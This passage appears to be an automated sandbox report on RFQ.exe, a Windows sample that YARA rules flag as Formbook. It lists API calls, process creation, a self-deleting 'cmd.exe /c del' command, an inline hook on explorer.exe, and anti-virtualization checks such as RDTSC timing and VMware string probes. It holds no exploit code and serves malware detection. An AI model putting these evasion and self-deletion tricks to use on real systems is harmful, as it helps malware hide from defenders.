          Source: 7.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_00419D60 NtCreateFile,7_2_00419D60
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_00419E10 NtReadFile,7_2_00419E10
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_00419E90 NtClose,7_2_00419E90
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_00419F40 NtAllocateVirtualMemory,7_2_00419F40
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_00419E0B NtReadFile,7_2_00419E0B
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_00419E8A NtClose,7_2_00419E8A
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_00419F3A NtAllocateVirtualMemory,7_2_00419F3A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679540 NtReadFile,LdrInitializeThunk,14_2_04679540
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046795D0 NtClose,LdrInitializeThunk,14_2_046795D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679660 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04679660
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679650 NtQueryValueKey,LdrInitializeThunk,14_2_04679650
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046796E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_046796E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046796D0 NtCreateKey,LdrInitializeThunk,14_2_046796D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679710 NtQueryInformationToken,LdrInitializeThunk,14_2_04679710
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679FE0 NtCreateMutant,LdrInitializeThunk,14_2_04679FE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679780 NtMapViewOfSection,LdrInitializeThunk,14_2_04679780
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679860 NtQuerySystemInformation,LdrInitializeThunk,14_2_04679860
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679840 NtDelayExecution,LdrInitializeThunk,14_2_04679840
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_04679910
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046799A0 NtCreateSection,LdrInitializeThunk,14_2_046799A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679A50 NtCreateFile,LdrInitializeThunk,14_2_04679A50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679560 NtWriteFile,14_2_04679560
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679520 NtWaitForSingleObject,14_2_04679520
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0467AD30 NtSetContextThread,14_2_0467AD30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046795F0 NtQueryInformationFile,14_2_046795F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679670 NtQueryInformationProcess,14_2_04679670
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679610 NtEnumerateValueKey,14_2_04679610
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679760 NtOpenProcess,14_2_04679760
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0467A770 NtOpenThread,14_2_0467A770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679770 NtSetInformationFile,14_2_04679770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679730 NtQueryVirtualMemory,14_2_04679730
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0467A710 NtOpenProcessToken,14_2_0467A710
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046797A0 NtUnmapViewOfSection,14_2_046797A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0467B040 NtSuspendThread,14_2_0467B040
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679820 NtEnumerateKey,14_2_04679820
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046798F0 NtReadVirtualMemory,14_2_046798F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046798A0 NtWriteVirtualMemory,14_2_046798A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679950 NtQueueApcThread,14_2_04679950
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046799D0 NtCreateProcessEx,14_2_046799D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679A20 NtResumeThread,14_2_04679A20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679A00 NtProtectVirtualMemory,14_2_04679A00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679A10 NtQuerySection,14_2_04679A10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679A80 NtOpenDirectoryObject,14_2_04679A80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679B00 NtSetValueKey,14_2_04679B00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0467A3B0 NtGetContextThread,14_2_0467A3B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00659D60 NtCreateFile,14_2_00659D60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00659E10 NtReadFile,14_2_00659E10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00659E90 NtClose,14_2_00659E90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00659F40 NtAllocateVirtualMemory,14_2_00659F40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00659E0B NtReadFile,14_2_00659E0B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00659E8A NtClose,14_2_00659E8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00659F3A NtAllocateVirtualMemory,14_2_00659F3A
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_075D60100_2_075D6010
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_075D1D7D0_2_075D1D7D
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_075D00400_2_075D0040
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_075D00060_2_075D0006
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_0041E8417_2_0041E841
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_0041D0187_2_0041D018
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_004010307_2_00401030
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_0041E1FC7_2_0041E1FC
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_00402D877_2_00402D87
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_00402D907_2_00402D90
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_00409E407_2_00409E40
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_00409E3B7_2_00409E3B
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_0041E7E77_2_0041E7E7
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_00402FB07_2_00402FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046FD46614_2_046FD466
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0464841F14_2_0464841F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04701D5514_2_04701D55
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04630D2014_2_04630D20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04702D0714_2_04702D07
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0464D5E014_2_0464D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_047025DD14_2_047025DD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466258114_2_04662581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04656E3014_2_04656E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046FD61614_2_046FD616
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04702EF714_2_04702EF7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04701FF114_2_04701FF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F100214_2_046F1002
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_047028EC14_2_047028EC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046620A014_2_046620A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_047020A814_2_047020A8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0464B09014_2_0464B090
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465412014_2_04654120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0463F90014_2_0463F900
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_047022AE14_2_047022AE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04702B2814_2_04702B28
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046FDBD214_2_046FDBD2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466EBB014_2_0466EBB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0065E1FC14_2_0065E1FC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00642D8714_2_00642D87
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00642D9014_2_00642D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00649E4014_2_00649E40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00649E3B14_2_00649E3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00642FB014_2_00642FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0463B150 appears 35 times
          Source: RFQ.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: RFQ.exeBinary or memory string: OriginalFilename vs RFQ.exe
          Source: RFQ.exe, 00000000.00000000.326713042.00000000009B2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameD vs RFQ.exe
          Source: RFQ.exeBinary or memory string: OriginalFilename vs RFQ.exe
          Source: RFQ.exe, 00000007.00000002.444723171.000000000165F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ.exe
          Source: RFQ.exe, 00000007.00000002.444419638.00000000012C8000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs RFQ.exe
          Source: RFQ.exe, 00000007.00000000.391061443.0000000000AB2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameD vs RFQ.exe
          Source: RFQ.exeBinary or memory string: OriginalFilenameD vs RFQ.exe
          Source: RFQ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000007.00000002.444247401.0000000001220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.444247401.0000000001220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.593192539.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.593192539.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.395391792.0000000003DD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.395391792.0000000003DD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.592662426.0000000000640000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.592662426.0000000000640000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.443676021.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.443676021.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.444182169.00000000011F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.444182169.00000000011F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.593093257.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.593093257.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@3/2
          Source: C:\Users\user\Desktop\RFQ.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_01
          Source: C:\Users\user\Desktop\RFQ.exeMutant created: \Sessions\1\BaseNamedObjects\iNvBcjNipEgPNF
          Source: RFQ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RFQ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: RFQ.exeVirustotal: Detection: 35%
          Source: RFQ.exeReversingLabs: Detection: 16%
          Source: unknownProcess created: C:\Users\user\Desktop\RFQ.exe 'C:\Users\user\Desktop\RFQ.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\RFQ.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Users\user\Desktop\RFQ.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: RFQ.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.426278317.000000000EF20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000007.00000002.444723171.000000000165F000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.595187979.0000000004610000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RFQ.exe, 00000007.00000002.444723171.000000000165F000.00000040.00000001.sdmp, rundll32.exe
          Source: Binary string: rundll32.pdb source: RFQ.exe, 00000007.00000002.444396323.00000000012A9000.00000004.00000020.sdmp
          Source: Binary string: rundll32.pdbGCTL source: RFQ.exe, 00000007.00000002.444396323.00000000012A9000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.426278317.000000000EF20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_05411598 push eax; mov dword ptr [esp], ecx0_2_0541159C
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_075D224A push cs; ret 0_2_075D224C
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_075D02D2 push 0000002Eh; ret 0_2_075D02D4
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_075D12C2 push ds; ret 0_2_075D12C3
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_075D22A3 push cs; ret 0_2_075D22A4
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_004170A0 pushfd ; retf 7_2_004170A6
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_0041CEB5 push eax; ret 7_2_0041CF08
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_0041CF6C push eax; ret 7_2_0041CF72
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_0041CF02 push eax; ret 7_2_0041CF08
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_0041CF0B push eax; ret 7_2_0041CF72
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0468D0D1 push ecx; ret 14_2_0468D0E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_006570A0 pushfd ; retf 14_2_006570A6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0065CEB5 push eax; ret 14_2_0065CF08
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0065CF6C push eax; ret 14_2_0065CF72
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0065CF02 push eax; ret 14_2_0065CF08
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0065CF0B push eax; ret 14_2_0065CF72

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xE3
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\RFQ.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000006498E4 second address: 00000000006498EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000649B5E second address: 0000000000649B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 7_2_00409A90 rdtsc 7_2_00409A90
          Source: C:\Users\user\Desktop\RFQ.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\RFQ.exe TID: 7112Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exe TID: 6796Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5572Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000008.00000000.423725449.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000008.00000000.423831795.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000008.00000002.608752063.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
